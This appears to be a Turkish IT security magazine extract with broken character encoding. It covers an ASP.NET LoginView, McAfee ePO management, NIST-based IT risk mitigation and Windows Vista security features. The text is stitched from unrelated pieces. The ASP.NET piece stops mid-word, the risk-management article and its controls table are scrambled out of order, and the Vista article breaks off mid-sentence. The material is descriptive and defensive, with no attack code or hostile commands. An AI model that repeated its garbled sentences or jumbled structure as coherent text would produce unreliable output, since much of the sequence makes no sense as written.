ASP.NET 2.0 içinde gelen üyelik sistemi ve provider modeli,
sunulan yeni sunucu web kontrolleriyle oluflturulacak web
sitelerinde, kimlik do¤rulama ve yetkilendirmeyi oldukça kolay bir hale getirmektedir. Provider modelindeki esnek yap›
ve sunulan API‘ler sayesinde, özellefltirilmifl kimlik do¤rulama ve yetkilendirme mekanizmalar› oluflturmak oldukça kolayd›r.
LoginView
Ço¤unlukla sitenizdeki web sayfas›nda kullan›c›n›n kay›tl› bir
kullan›c› ya da anonim bir kullan›c› olma durumuna göre
farkl› içerikler sunmak isteyebilirsiniz. Örnek vermek gerekirse anonim bir kullan›c›ya ana sayfan›zda bir login kontrolü gösterirken kay›tl› bir kullan›c› için “hoflgeldin” mesaj›
vermek isteyebilirsiniz. Bu gibi durumlarda LoginView iflinizi oldukça kolaylaflt›racakt›r. Loginview; AnonymousTemplate ve LoggedInTemplate olmak üzere iki flablon içerir. Kul-
Coflkun KAM‹LO⁄LU
[email protected]
McAfee Sistem Güvenlik Yönetimi
cAfee ePO (Event Policy Orchectrator) tüm McAfee sistem güvenlik yaz›l›mlar›n›n yönetilebildi¤i
bir platformdur. Yaklafl›k 250.000 istemci ve sunucunun ayn› anda yönetilebilmesine olanak tan›yan bu güvenlik platformu, sistem güvenlik yaz›l›mlar›n›n uzak kurulumunu, güncellenmesini, ayarlanmas›n› ve raporlama ifllemlerinin tek bir noktadan yap›labilmesini sa¤lar.
M
Windows 2000 ve 2003 sunucular› üzerinde çal›flabilen güvenlik yönetimi yaz›l›m› üç farkl› birimden oluflur.
ePO agent: Yönetimi yap›lacak tüm istemci ve sunuculara
kurulmas› gereken bu birim, uzak noktan›n ePO sunucu ile
irtibat›n› sa¤lar. “Push” teknolojisi kullan›larak uzak birimlere yüklenebilir.
ePO sunucu: ePO yönetim platformunun ana birimidir ve
tüm uzak yüklemeler, yüklenecek güvenlik yaz›l›mlar›n›n
konfigürasyonu ve güncelleme ifllemleri ePO sunucu üzerinde yarat›l›r.
Veritaban›: Yap›lan tüm konfigürasyonlar ve raporlar MS
SQL 2000, 2005 veya MSDE veritaban›nda tutulur.
ePO agent yaz›l›m› yaklafl›k 1.5MB boyutunda küçük bir programd›r ve yönetimi yap›lacak sunucu ve istemcilere Domain
kullan›c› ad› ve flifresi kullan›larak uzaktan Push teknolojisiyle yüklenebilir. Yükleme tamamland›ktan sonra agent, belirli
aral›klarla ePO sunucuyla ba¤lant›ya geçer ve yeni oluflturulan görevleri al›r/uygular. Push teknolojisinin haricinde
agent, login script, ghost imaj ve do¤rudan yükleme gibi teknolojiler kullan›larak da uzak sistemlere yüklenebilir.
ePO sunucu platformun ana merkezidir ve tüm ifllemler bu
platform üzerinden gerçeklefltirilir. Uzak sistemlere bir kez
agent yaz›l›m› kurulduktan sonra tüm McAfee sistem güvenlik yaz›l›mlar› bu merkezi noktadan kurulabilir, kald›r›labilir,
güncellemeleri yap›labilir veya tüm sistemler için, sistem
gruplar› için, tek bir sistem için farkl› konfigürasyonlar yap›labilir. Yine istenildi¤inde kolayl›kla bu konfigürasyonlar de¤ifltirilip uzak sistemlere uygulanabilir. McAfee ePO güvenlik yönetimi yaz›l›m› kullan›larak yönetimi yap›labilecek yaz›l›mlar afla¤›da s›ralanm›flt›r.
McAfee ViruScan 4.51, 7.0, 7.1, 8.0 ve 8.5. Sunucu ve istemcilerin virüs güvenli¤inden sorumludur. Buffer Overflow korumas› da içeren ürün s›f›r›nc› gün güvenli¤i sa¤lar ve henüz
yamas› olmayan veya temin edilemeyen Buffer Overflow
aç›klar› için koruma sa¤lar. Ürünün son güncel versiyonu
olan 8.5 versiyonunda sistem belle¤inde saklanan Rootkit’lere karfl› koruma özelli¤i getirilmifltir. Registry, dosya ve
port bazl› k›s›tlamalar yap›labilir ve bir virüs salg›n› s›ras›nda ek önlemler al›narak Virüs veya Worm gibi zararl› yaz›l›mlar›n yay›lmalar›n› engelleyebilir.
McAfee Anti-Spyware 8.0, 8.5. Spyware ve Adware gibi is-
tenmeyen yaz›l›mlar›n sistemlerden uzak tutulmas›n› sa¤lar.
Registry taramas› ve çerez taramas› bu modül taraf›ndan
gerçeklefltirilir. McAfee Netshield. Novell Sunucular üzerinde koruma sa¤layan bu ürün Novell Netware 6.5, Netware
6.0 ve Netware 5.1 üzerine kurulabilir. Gerçek zamanl› (OnAccess) deste¤i olan ürün Novell Sunuculara karfl› düzenlenecek DDoS (distributed denial of service) ataklar›na karfl›
sistem güvenli¤i sa¤lar.
McAfee Groupshield Microsoft Exchange 2000 & 2003 ve
Lotus domino 5.0, 6.0, 6.5, 7 e-posta sunucular için gelifltirilmifl olan bu yaz›l›m e-posta yoluyla sistemleri tehdit eden
unsurlara karfl› Anti-virüs/Anti-Spam korumas› sa¤lar. ‹çerik
filtrelemesi ile gelen e-postalarda oldukça detayl› tarama
yap›labilir. Lotus e-posta sunucu ürününün Windows deste¤i oldu¤u gibi, Solaris ve AIX deste¤i de mevcuttur.
McAfee LinuxShield Linux sistemlerin korumas› için kullan›l›r. Gerçek zamanl› (On-Access) tarama deste¤i olan LinuxShield lokal arayüz veya ePO üzerinden yönetilebilir.
McAfee SecurityShield Microsoft ISA 2000, 2004 ve 2006
güvelik duvar› üzerine kurulabilen SecurityShield yaz›l›m›
gateway korumas› sa¤lar. SMTP, HTTP ve FTP üzerinden gelebilecek tehditler henüz a¤a girmeden engellenebilir. Virüs
güvenli¤i haricinde ileri seviyede içerik filtreleme yine SecurityShield üzerinde etkinlefltirilebilir. McAfee Spamkiller modülü ile Spam korumas› yine bu ürünle sa¤lanabilir.
McAfee PortalShield Microsoft Sharepoint 2001,2003 ve
Sharepoint Services yaz›l›mlar› üzerinde koruma sa¤lar.
Yaklafl›k 300 doküman tipi desteklenir ve bu dokümanlarda
virüs korumas› ve içerik filtrelemesine olanak tan›n›r.
McAfee Host Intrusion & Protection. Kurulumu ve yönetimi
ePO sunucu üzerinden yap›labilen bir baflka güvenlik ürünü
de Host Intrusion & Prevention’d›r. Ürün Microsoft Windows
NT 4.0, 2000, 2003, XP iflletim sistemlerine kurulabilir ve
bu sistemlere yap›labilecek uzak veya lokal sald›r›lara karfl›
korunmas›n› sa¤lar. Entegre desktop firewall ile tek bir noktadan güvenlik duvarlar› kurallar› oluflturulabilir ve sistem
kümelerine tek bir noktadan uygulanabilir. Çal›flt›r›lmas› istenmeyen program veya dosya uzant›lar› Application Blocking özelli¤i ile sa¤lanabilir. Fingerprint özelli¤i sayesinde
dosyan›n ad› de¤ifltirilse bile çal›flt›r›lmas›na engel olunabilir. USB portlar kullan›larak sisteme Flash bellek entegre
edilmesi ve dosyalar›n firma d›fl›na ç›kar›lmas› engellenebilir. Yaklafl›k 500 atak imzas›n›n destek verildi¤i üründe ayr›ca sezgisel (Behavior) tabanl› koruma da mevcuttur.
McAfee SCM (Secure Content Management ) Gateway korumas›. Donan›m tabanl› olan bu ürün Gateway de SMTP,
FTP, HTTP, HTTPS, POP3 ve ICAP protokolleri üzerinden gelebilecek tehditleri ortadan kald›r›r. Ürün Virüs, Spyware, Adware, Spam gibi tehditlere karfl› koruma sa¤lad›¤› gibi URL ve
içerik filtreleme yap›labilmesine de olanak sa¤lar. Bridge modunda çal›flabilen cihazlar a¤da herhangi bir de¤ifliklik yap›lmadan entegre edilebilir. E-posta içerisinde filtreleme yap›la-
McAfee Sistem Güvenlik Yönetimi
bildi¤i gibi 50’den fazla dosya içerisinde de bu tip içerik filtrelemesine olanak sa¤lar. %97 gibi baflar›l› bir Spam yakalama
oran›na sahip ürün Spam için McAfee taraf›ndan gelifltirilmifl
kurallar› her 5 dakikada bir güncelleyebilir.
McAfee Policy Enforcer McAfee Network Admission Control ürünü yine ePO üzerinden yönetilebilir. ePO agent yüklü olan sistemlerde ePO sunucu üzerinden yarat›lan politika
uygulanabilir ve sistemlerin a¤a girifl yapabilmesi için sahip
olmas› gereken minimum güvenlik seviyesi, sunucu veya istemcilerde lokal olarak uygulanabilir. Sistem istenilen seviyede de¤ilse TDI driver kullan›larak sistemin a¤ ba¤lant›s›
lokal olarak kesilir ve sadece iyilefltirme portal›na gitmesine
izin verilir. Sistem bu portalda istenilen güvenlik seviyesine
ç›kar›ld›ktan sonra a¤ ba¤lant›s› yap›lmas›na izin verilir. ePO
agent yüklü olmayan sistemlerin kontrolü için uzak tarama
ve Switch enforcement yap›labilir ve bu tip sistemlerin
switch üzerinde oluflturulan karantina VLAN’lar›na at›lmas›
ve iyilefltirmelerin bu VLAN’da yap›lmas› sa¤lan›r. Ürün ayr›ca Cisco Trust Agent 2.0 yaz›l›m›n›nda uzak yüklemesinin
yap›lmas›n› sa¤layabilir ve Access Control Server ile konuflarak sistemlerin a¤a al›n›p al›nmamas›na karar verebilir.
McAfee Citadel Henüz entegrasyon aflamas›nda olan bu
ürün otomatik yama yönetimi, varl›k yönetimi ve risk yönetiminin ePO üzerinden yap›labilmesine olanak tan›yacakt›r.
McAfee Data Loss Prevention (DLP) Bilgi s›z›nt›s› (Data
Leakage) ürünü entegrasyon aflamas›ndad›r. Sistemlerden,
Kopyalama, e-posta, floppy/CD/USB gibi cihazlar kullan›larak veya ç›kt› almak gibi yöntemler kullan›larak yap›labilecek s›z›nt›lar McAfee DLP ürünü kullan›larak engellenebilir.
Yukar›da bahsedilen tüm sistemler için farkl› grafik ve text
raporlama imkânlar› sunulmakta ve bu raporlar›n oluflturulabilmesi için ihtiyaç duyulan veri SQL sunucuda tutulmaktad›r. Bu sunucu ePO ile ayn› sistem üzerinde olabildi¤i gibi
uzak bir noktada hali haz›rda kullan›lmakta olan bir SQL sunucuda olabilir.
McAfee ePO yönetim platformunda kullan›c› say›s› ne kadar
fazla olursa olsun sadece tek bir ePO yönetim yaz›l›m›na ihtiyaç duyulmaktad›r. Farkl› co¤rafi bölgelerdeki sistemlerin
güvenlik yönetimi, yaz›l›m kurulumu veya güncelleme ifllemlerinin düflük h›zl› WAN ba¤lant›lar› üzerinden yap›lmamas›
için McAfee, Superagent özelli¤ini gelifltirmifltir. Herhangi
bir agent’›n sadece fonksiyonalitesini de¤ifltirerek bu özellik
sa¤lanabilir ve da¤›t›k repository özelli¤i kullanarak uzak
kurulumlar›n veya güncellemelerin WAN ba¤lant›lar› üzerinden de¤il o co¤rafi konumdan sorumlu superagent’in kendi
repository’si kullan›larak lokal olarak yap›lmas› sa¤lanabilir.
Örnek verecek olursak, 150 kullan›c›l› bir uzak lokasyonda
Antivirüs yaz›l›m› kurulmak istenirse normal koflullarda ayn›
yaz›l›m 150 kez gönderilmek zorundad›r. Ancak Superagent,
ePO sunucunun sahip oldu¤u repository’nin bir kopyas›n›
tuttu¤u için kurulumlar ve güncellemeler o bölgede ki lokal
bir Superagent repository’si üzerinden yap›labilir.
Yönetimi yap›lacak sistemler ePO üzerinde yarat›lacak
gruplar›n alt›na kümelenmekte ve sistemler bu gruplar›n alt›na al›nmaktad›r. Bu ifllem yap›l›rken en çok kullan›lan yöntem Active Directory entegrasyonudur. Active Directory
içersinde yarat›lan tüm organizasyonel birimler LDAP sorusu yap›larak görülebilmekte ve sistemler Active Directory’den yarat›lan gruplar›n alt›na al›nabilmektedir. ‹stenirse Active Directory organizasyonel birimler oldu¤u gibi
ePO ya al›nabilir. Hangi AD OU’nun hangi ePO grubuna map
edildi¤i bilgisi saklanabilir ve bir görev olarak de¤iflik zamanlarda otomatik olarak çal›flabilir. Böylece AD’ye yeni
eklenen sistemler otomatik olarak ePO ‘da yarat›lan gruplara da al›nabilir.
Sistemlerde oluflan olaylar (Virüs bulunmas›, temizlenmesi,
güncellenme yap›lmas›, kullan›c› taraf›ndan ürünlerin silinmeye çal›fl›lmas› vs.) ePO agent taraf›ndan XML dosyalar›na
kaydedilir ve belirli aral›klarla ePO sunucusuna gönderilir.
ePO sunucusu XML dosyalar›n› parse eder ve bunlar› veritaban›na yazar. Sistem yöneticileri baz› durumlardan haberdar olmak isterse ePO uyar› sistemini kullanabilirler. Yaklafl›k 100 den fazla olay için farkl› tan›mlamalar yap›labilir ve
sistem yöneticileri e-mail, snmp trap, Pager gibi yöntemlerle bu tip olaylardan haberdar olabilirler.
Sistemlerin Virüs güvenli¤inin otomatize edilebilmesi aç›s›ndan McAfee farkl› baz› teknolojiler gelifltirmifltir. Bunlardan
biri Rogue System Detection‘d›r ve Network’de üzerinde
agent bulunmayan sistemlerin tespit edilmesi ve otomatik
olarak bu sistemlere agent yüklenmesinden sorumludur.
Sisteme bir kez agent’›n yüklenmesi demek arkas›ndan istenilen güvenlik yaz›l›mlar›n›n ve bunlar›n güncellemelerinin
yüklenmesi anlam›na geldi¤i için Domain’in bir parças› olan
sistemler için tamamen otomatize edilmifl kurulum ve konfigürasyon sa¤lanmas› anlam›na gelir. RSD her bir subnet’e
Network’ü dinleyen yaz›l›m tabanl› sensor’lerin kurulmas› ile
çal›flabilmektedir.
Bu sensor trafi¤i dinler ve üzerinde agent yaz›l›m› olmayan
sistemleri bulup bunlar› ePO sunucusuna haber verir. ePO
sunucu bu sistemleri ait oldu¤u gruplara al›r ve otomatik
olarak agent gönderimine bafllar. Agent yüklendikten sonra
ePO sunucu ile ba¤lant›ya geçer ve kurulmas›n› istedi¤imiz
yaz›l›mlar›, bu yaz›l›mlar›n güncellemelerini veya güncellemelerin hangi lokasyondan al›naca¤› gibi birçok kural› al›r ve
bunlar› uygulamaya koyulur. Ayn› lokasyonda birden fazla
subnet mevcut ise ayn› sunucu&istemci üzerine her bir subnet için bir Ethernet kart› tak›lmak flart›yla sensor say›s› düflürülebilir.
McAfee ePO güvenlik yaz›l›m› düflük kullan›c› say›s›ndan oldukça yüksek kullan›c› say›lar›na kadar her türlü sisteme kolayl›kla entegre edilebilir ve sistem yöneticilerinin yükünü
minimum seviyeye indirebilir. Geliflmifl raporlama seçenekleri ile sistemlerin güvenli¤inin ne seviyede oldu¤u fazla
efor harcamadan tespit edilebilir ve çok k›sa zamanda ilgili
önlemler al›nabilir.
Bora DAL
[email protected]
Biliflim Sistemleri ve Risk Yönetimi:
Dalgal› denizlere yelken açmak
Yaz›n›n ilk bölümünü;
www.coldbytes.net/BT_Risk_Yon_b1.pdf adresinden indirebilirsiniz.
Risk ‹ndirgenmesi
Öncelikle bilinmelidir ki, risk yönetiminin ilk aflamas› olan
riskin belirlenmesi süreci ne kadar verimli geçerse geçsin,
bir organizasyonun çevresindeki bütün risklerin etkin bir flekilde ortaya ç›kart›lmas›, envanterinin yap›lmas› ve olas›
darbenin analizi mümkün de¤ildir. Her zaman fark edilmemifl, gözden kaçm›fl ya da gerçekleflmesi durumunda darbe
fliddeti küçümsenmifl ve düflük risk kategorisine konmufl
tehditler olacakt›r. Unutulmamal›d›r ki risk yönetiminin
amac› bütün riskleri kapsamak de¤il, tehditlerin gerçekleflmesi halinde darbesi organizasyona en çok zarar verebilecek olanlar›n ortaya ç›kart›lmas›d›r.
Risk indirgenmesi, risk yönetimi sürecinin ikinci aflamas›
olup risk önceliklendirmesi, ölçeklendirmesi ve ard›ndan da
söz konusu risk azalt›c› kontrollerin konulmas›d›r. Bir önceki paragrafta anlat›ld›¤› gibi var olan tüm risklerin zarars›z
hale getirilmesi mümkün olmad›¤› için risk yönetimi sürecinin kurulmas›n› destekleyen organizasyon yöneticileri, en fiyat-etkin yaklafl›mla organizasyonun operasyonel risklerinin kabul edilir seviyeye indirmeyi hedeflemelidir.
Afla¤›da risk indirgenmesi aflamas›nda izlenebilecek yöntemler s›ralanm›flt›r.
Risk varsay›m›: Potansiyel riski kabul ederek IT operasyonlar›na, riskleri kabul edilir bir seviyeye söz konusu kontrolleri kurmak suretiyle indirerek devam etmek.
Riskten sak›nma: Risk kayna¤›n› ve/veya sonuçlar›n› ber-
Önleyici: Süreçlerin aksamas›n› veya yanl›fl yönde hareket
Organizasyonlar›n hangi çözümü ya da çözümleri seçecekleri faaliyet gösterdikleri endüstriye ve kendilerine özel koflullara göre de¤iflir. Her zaman amaç öncelikli olarak organizasyonun devaml›l›¤›n› tehdit edecek ve söz konusu tehditlerin gerçekleflmesi durumunda kay›plara yol açabilecek
risklerin engellenmesi olmal›d›r. Risk indirgenmesinde izlenecek koflullar ve uygulamalar için farkl› olsa bile genel hatlar›yla sistemlerin mimarisi ve tehdit kayna¤› ile do¤rudan ilgilidir. Yine temel olarak unutulmayacak nokta tehdidin her
zaman var oldu¤u, ancak uygulanabilmek için sistemlere gereksinim duydu¤udur. Öncelikle riskin d›fl kaynaklar›, sonra
da sistemlerde faydalanabilinecek zay›fl›klar belirlendikten
sonra riskin var olup olmad›¤› sonucuna var›lmal›d›r. Devam›nda sald›ran›n perspektifinde, yap›lacak kazanç-çaba analizini ve bizim aç›m›zdan ortaya ç›kart›lacak söz konusu kay›p beklentisini kapatmak için at›lacak ad›mlar›n bize maliyetini göz önüne alarak riskin kabul edilebilir ya da edilmez
oldu¤unu belirleyebiliriz.
Destekleyici: Baflka kontrollerin var olmas›na ve süreçlerin iflleyifli yönünde kurulabilmesine olanak tan›r.
etmesini engeller.
Risk yönetimi söz konusu olunca bahsetmemiz gereken kontroller 3 alanda tasarlanmal›d›r.
1. Teknik
2. ‹dari
3. Operasyonel
Haz›rlad›¤›m tabloda baz› örnek kontroller ve ilgili olduklar›
alanlar belirtilmifltir. Bu tabloya organizasyona özel eklemeler de yap›labilir.
Kontrollerin süreçlere eklenmesi s›ras›nda en çok dikkate
al›nmas› gereken nokta maliyet-yarar analizidir. En baflta da
Alan›
Kontrol turu
Fark edici ve düzeltici
Biliflim sistemleri kontrolleri
Organizasyonlar›n teknik, yönetim ve operasyonel güvenlik
alanlar›nda, organizasyonun bafl›na gelebilecek ve zarar verebilecek tehditlerin oluflmas›n› önlemek ya da olufltuktan
sonra zararlar›n› azaltmak için biliflim sistemleri kontrollerinden faydalanmalar› gerekmektedir.
Önleyici
Teknik
B
Risk aktarma: Sigorta ve benzeri çözümler kullanarak riski baflkalar›na devretme.
Kontrol, süreçlerin kendilerinden beklendi¤i gibi çal›flmalar›n› sa¤layan teyit noktalar› olarak görülebilir. Genel olarak
kontroller kendi aralar›nda 3’e ayr›l›r:
Destekleyici
Fark edici ve düzeltici: Süreçler beklenmedi¤i gibi ifllemeye bafllad›¤›nda fark edilmesini sa¤lar ve düzeltici yönde harekete geçer.
‹dari
ir önceki makalede aç›klamaya çal›flt›¤›m risk, tehdit
gibi kavramlardan ve risk yönetimi sürecinin kurulmas›na yönelik ilk aflamadan sonra bu yaz›da 2. ve 3.
aflamalar olan Risk ‹ndirgemesi(Risk Mitigation) ve Gözden
Geçirme ve Yeniden Belirleme (Evaluation and Re-assessment) konular›na de¤inilecektir.
NIST Risk Management Guide
Önleyici
taraf ederek riskten kaç›nma.
Risk k›s›tlamas›: Darbenin olumsuz etkilerini aza indirge-
Önleyici
Risk planlamas›: Risk indirgeme plan› yaparak kontrolleri önceliklendirme, kurma ve devam ettirme yoluyla riski yönetme.
Araflt›rma ve anlama: Kay›p riskini azaltarak zay›fl›¤› veya tehdidi önleyici kontroller araflt›rarak düzenlenmesi
Operasyonel
yen kontroller (önleyici ve fark edici) yerlefltirerek risklerin
olumsuz etkisini k›s›tlamak.
belirtildi¤i gibi e¤er bir kontrolün bir sürece eklenmesinin maliyeti, o sürecin beklenmedi¤i gibi gitmesi durumunda oluflacak zarardan fazlaysa, gereklili¤i iki defa de¤erlendirilmelidir.
Unutulmamal›d›r ki eklenen kontroller asla riskleri tamamen
kapatmaz, en iyimser yaklafl›mla minimal seviyeye indirir.
Gözden geçirme ve yeniden belirleme
Risk yönetimini oluflturan ilk iki aflaman›n sonuçlar›n›n organizasyonun o anki halini yans›tt›¤›n› unutmamak laz›md›r. Organizasyonun sürekli de¤iflti¤i, bununla beraber, süreçlerin,
uygulamalar›n ve altyap›n›n da sürekli de¤iflim halinde oldu¤u gözlemlenebilir. Bin bir u¤raflla (ya da kolayca) kurulmufl
bir risk yönetimi sürecinin, organizasyonun de¤iflimine ayak
uydurmas› hayati önem tafl›maktad›r. Bunun için periyodik
olarak de¤ifliklikler ele al›nmal›, ilk iki aflama gözden geçirilmeli ve yeniden yap›land›r›lmal›d›r. Bunu yaparken yeni yasal
gereksinimler de gözden geçirilmeli, risklerin tehdit seviyeleri gerekirse de¤ifltirilmelidir.
Kontrol
Sistem kay›tlar›n›n incelenmesi
‹zinsiz giriflleri fark etme ve uygun hareket etme mekanizmas›
Sistem veri bütünlü¤ü analizi
Güvenli geçmifl zamana dönme
Virüsleri tan›mlama ve engelleme
Sistem kimlik do¤rulamas›
Kullan›c› yetkilendirme
‹nkar edilemezlik
Eriflim kontrolleri
Güvenli iletiflim
‹fllem gizlili¤i
Kullan›c›, süreç ve bilgi kaynaklar›n›n ay›rt edilebilmesi
Kriptografik anahtar yönetimi
Güvenlik yönetimi
Personelin ifle al›m öncesi araflt›r›lmas›
Var olan kontrollerin gözden geçirilmesi
Dönemsel sistem denetimleri
Etkin olay-tepki sistemi
Gereksinimlere uygun tasarlanm›fl, yönetim taraf›ndan onaylanm›fl ve düzenli
olarak test edilmifl güncel is süreklili¤i ve felaket kurtarma plan›.
Önemli sistemlere sorumlu atanmas›
Güvenlik plan› ve var olan kontrollerin dokümantasyonu
Görev ayr›m› ilkesi ve gereksinildi¤i kadar kullan›c› hakki verilmesi
Kullan›c›lara güvenlik bilincinin afl›lanmas› ve e¤itim
Organizasyon içi fiziksel güvenlik
Veri da¤›t›m›n›n kontrollü yap›lmas›
Veri medyas›n›n elden ç›kart›lma aflamas›nda izlenecek yöntemin belirlenmesi
Kritik alanlar›n fiziksel eriflim k›s›tlamalar›
Veri iletim yollar›n›n güvenli¤i
Gereksinimler do¤rultusunda haz›rlanm›fl veri yedeklenme prosedürü ve bunu
destekleyici yaz›l›m ve donan›m. Yede¤in güvenli ve farkl› bir yerde tutulmas›
Tafl›nabilir bilgisayar ve PDA deki veri güvenli¤i ile ilgili önlemler
Gereksinimler do¤rultusunda ayarlanm›fl yedek güç üniteleri
Kritik sistemlerin bulundu¤u ortamlar›n çevresel kontrolleri (nem, isi...) sa¤lanmas›
KAYNAKÇA
• NIST Risk Management Guide for Information Technology Systems
• UK: RMI Risk Management Standard • Wikipedia • ISACA - Control Journal – Makale : Living With Risk
Gizlilik
Bütünlük
Süreklilik
Mehmet ÜNER
[email protected]
Windows Vista Güvenlik Özellikleri
icrosoft taraf›ndan, Kas›m ay›nda kurumsal versiyonlar› ve Ocak ay›nda da kiflisel versiyonlar› piyasaya sürülen Windows Vista, Microsoft’un tarihinde gelifltirdi¤i en büyük IT projesi. Yap›lan yat›r›m, çal›flan kifli say›s› ve geçen süre göz önüne al›nd›¤›nda belki de
dünyadaki en büyük IT projesi olmaya aday. Türkiye’de Kas›m ay›ndan beri birçok kurumun kullanmaya bafllad›¤› Windows Vista, Microsoft Zirvesi’ndeki lansman›yla beraber ev
kullan›c›lar›yla da buluflmaya bafllad›.
M
Windows Vista özellikle kullan›c› arayüzü, yönetilebilirlik,
bilgiye kolayca ulafl›m ve güvenlik konusunda çok yeni geliflmelere sahip bir iflletim sistemi. Bu yaz›da sadece güvenlik
özellikleri üzerinde duruyor olaca¤›z. Güvenlik bak›m›ndan
oldukça geliflmifl olan Windows Vista’n›n yeni güvenlik özellikleri 4 ana bafll›k alt›nda toplanabilir (fiekil 1):
•
•
•
•
flamdöngüsü’nün (SDL) en önemli özelli¤i, daha tasar›m aflamas›nda güvenli¤in ön planda olmas›, kodlama yap›l›rken
güvenlik dan›flmanlar›n›n kodlamay› kontrol etmesi ve kodlamadan sonra da güvenlik testleri/de¤erlendirmelerin de
ürün gelifltirmenin bir parças› olmas›d›r. SDL, sonuçlar›n›
“Windows Server Service Pack 1” ve “Windows XP Service
Pack 2” ile göstermiflti. Bu paketler iflletim sistemlerini daha
güçlü ve güvenli hale getirmiflti. fiimdi Vista, tamamen SDL
ile yaz›lan bir iflletim sistemi oldu¤u için güvenlik bak›m›ndan Microsoft’un ç›kard›¤› en güçlü iflletim sistemi durumunda.
fiekil -2
Temeller: Mühendislik
Güvenli Eriflim
Malware ve Sald›r›lara Karfl› Koruma
Bilgiyi Koruma
Servis güçlendirmesi de Vista’n›n temel güvenlik özelliklerinden biri (fiekil 2). Servisler art›k daha düflük haklarla çal›flt›r›l›yor. Windows servisleri art›k sadece a¤ üzerinde, dosya sisteminde ve kay›t defterinde izin verilen yerlere eriflebiliyor ve servis profilinde olmayan yerlere eriflemiyor. Böylece sald›r›lara karfl› birçok aç›k, en bafltan kapat›lm›fl oluyor. Ayn› zamanda servis bafl›na güvenlik tan›mlay›c›lar› sayesinde servisler kendi haklar›n› koruyabiliyorlar.
Windows Vista’n›n Güvenli Eriflim bafll›¤› alt›ndaki en önemli özellikleri ise Kullan›c› Hesab› Kontrolü, geliflmifl Audit yetenekleri ve USB cihazlar›n› daha etkin yönetebilme olarak
s›ralanabilir. Birçok kurumun bafl›n› a¤r›tan, kullan›c›lara admin yetkisi verilmesi sonucunda oluflan güvenlik sorunlar›
art›k ortadan kalk›yor. Kullan›c›lar art›k standart hesaplar›yla daha fazla ifllem yapabiliyor (time zone, güç ayarlar›, VPN
gibi) ve önceden onay verilmifl cihazlar› yükleyebiliyorlar.
Bunun d›fl›nda yönetici hakk›na sahip olmalar› gerekti¤inde
geçici olarak yönetici seviyesine yükseltiliyor ve ifllem bittikten sonra tekrar standart kullan›c› seviyesine indiriliyor.
Böylece kullan›c›n›n onay› olmadan arkaplanda hiçbir fley
yüklenemiyor veya çal›flam›yor. Bu özellik arka planda çal›flan zararl› kodlar› tamamen engelleyecek gibi gözüküyor.
Normal çal›flanlara ek olarak flirketin IT yöneticileri bile
standart kullan›c›larla çal›flabiliyor. Audit k›sm›nda ise alt
kategoriler, filtreleme seçenekleri ve geliflmifl kullan›c› deneyimi Windows Vista’n›n sundu¤u yeni özelliklerden.
Güvenli Eriflim özelliklerinin önemli bir parças› da USB cihazlar› üzerinde birçok politikan›n hayata geçirebilmesi. Kurumlar›n karfl›laflt›¤› en önemli zorluklardan biri de USB cihazlarla d›flar›ya s›zan kuruma ait kritik bilgiler. Birçok kurum bunu engellemek için bilgisayarlar›ndaki USB portlar›n›
tamamen kapatmakta. Bu da USB klavye, fare gibi çevresel
fiekil -3 Vista Firewall
Güvenlik geliflmelerinin ilk topland›¤› bafll›k Temeller. Temel
güvenlikte ilk bahsedilmesi gereken özellik ise Windows Vista’n›n Security Development Lifecycle (Güvenlik Gelifltirme
Yaflamdöngüsü) ile yaz›lm›fl ilk iflletim sistemi olmas›. 2001
y›l›nda Bill Gates’in öncülü¤ünde bafllayan Trustworthy
Computing (Güvenli Biliflim) hareketi ile Microsoft önceliklerini ve ifl yap›fl tarz›n› tamamen de¤ifltirdi. Bu tarihten sonra Güvenlik, ürün gelifltirmenin her alan›nda ön planda tutulmaya bafllad›. Windows yaz›l›mc›lar› zorunlu güvenlik e¤itimlerinden geçirildi ve iflletim sistemlerinin her bilefleni güvenlik bak›m›ndan ayr› ayr› ele al›nd›. Güvenli Gelifltirme Yafiekil 1 - Windows Vista Güvenlik Özellikleri
Windows Vista Güvenlik Özellikleri
cihazlar›n kullan›m›n› tamamen engellemekte. Windows Vista ile gelen yeni özellikler sayesinde USB girifllerinde IT yöneticilerine tam kontrol sa¤lanm›fl durumda. Yöneticiler art›k isterlerse USB sabit disk, bellek ünitelerini engellerken,
USB klavye, fare ve de¤iflik cihazlara izin verebilecekler.
‹nternet ve bilgiye sürekli ba¤l› olma iste¤i art›k hayat›m›z›n
vazgeçilmez bir parças›. Ama internet ve bilgiye sürekli ba¤l› olmak, kurumlar› ve kiflileri birçok sald›r›ya aç›k duruma
getiriyor. Windows Vista, getirdi¤i ‘malware’ ve sald›r›lara
karfl› koruma özellikleri sayesinde bu aç›klar› kapat›yor ve
sald›r›lar› önlemek için birçok yeni özellik sunuyor. Bunlar›n
en bafl›nda Internet Explorer 7.0, Güvenlik Duvar›, Windows
Defender, NAP (Network Acces Protection) ve ASLR (Address Space Layout Randomization) geliyor.
Internet Explorer 7.0’›n korumal› modda çal›flma özelli¤i sadece internet taramas› yap›lmas›na izin verir ve yaz›l›m yüklemek gibi ifllemlerin yap›lmas›na izin vermez. “Salt Okunur”
modda çal›flma özelli¤i ise, sadece “Temporary Internet Files” dizininin alt›na eriflime izin verir. Böylece internetten
gelebilecek güvenlik tehditleri iflletim sisteminin di¤er yerlerine eriflemez. Ayr›ca günümüzde çok büyük bir sorun olan
Phishing sald›r›lar›na karfl› da yeni Internet Explorer bir
Phishing Filtresi sunmaktad›r. Böylece kullan›c›lar Phishing
sitelerine eriflirken ekrana uyar›lar ç›kar ve eriflim engellenir. Phishing Filtresi, veri kayna¤› için global veri kayna¤›
a¤›n› kullan›r ve birkaç saatte bir kendini güncellefltirilir. Ayn› zamanda web sayfalar›n›, kullan›c› verisini çalmaya çal›flan sayfalar›n bilinen özelliklerine göre analiz eder ve böy-
fiekil -4 NAP (Network Access Protection)
lece bir veri kayna¤›na ihtiyaç duymadan da koruma sa¤layabilir.
Windows Vista’n›n içinde art›k çift tarafl› bir Güvenlik Duvar› (Firewall) bulunmakta (fiekil 3). Böylece hem içeriye hem
de d›flar›ya do¤ru statefull IPv4 ve IPv6 filtreleme yap›labilmekte. Ayn› zamanda d›flar›ya do¤ru uygulama tan›yan bir
filtreleme de Windows Vista’n›n sa¤lad›¤› güvenlik özelliklerinden. Yönetim bak›m›ndan ise Güvenlik Duvar› ve IPSec
yönetiminin birlefltirilmesi özellikle IT yöneticilerinin iflini
çok kolaylaflt›rd›. Spyware, bugün karfl›lafl›lan en büyük güvenlik sorunlar›ndan birisi.
Özellikle birçok kurum için spyware sorunu virüs sorunlar›n›n önüne geçmifl durumda. Windows Vista ise spyware’e
